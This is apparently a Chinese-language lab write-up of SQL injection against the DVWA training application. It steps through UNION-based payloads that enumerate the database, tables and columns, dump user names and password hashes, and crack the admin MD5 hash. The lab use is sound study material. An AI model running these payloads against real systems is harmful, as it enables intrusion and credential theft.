基于DWVA
1、
code:1’ or ‘1’=‘1 =>‘1’ or ‘1’ = ‘1’
运行结果:
2、
Code:1’ (注入点) order by 2 (排序) #(注释符)
运行结果:
3、
Code:1’ union select 1,2# (破库)
运行结果:
4、
Code:1’ union select 1,database()# (找数据库)
运行结果:
5、
Code:(查表)
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'dvwa')#
运行结果:
6、
Code:(找gusetbook表中的列)
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='guestbook')#
运行结果:
7、
Code:(找users表)
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')#
运行结果:
8、
Code:(找具体用户名和密码)
1' union select 1,(select group_concat(user," : ",password) from users)#
运行结果:
利用Cmd5解密:
user:admin
password: 5f4dcc3b5aa765d61d8327deb882cf99 => password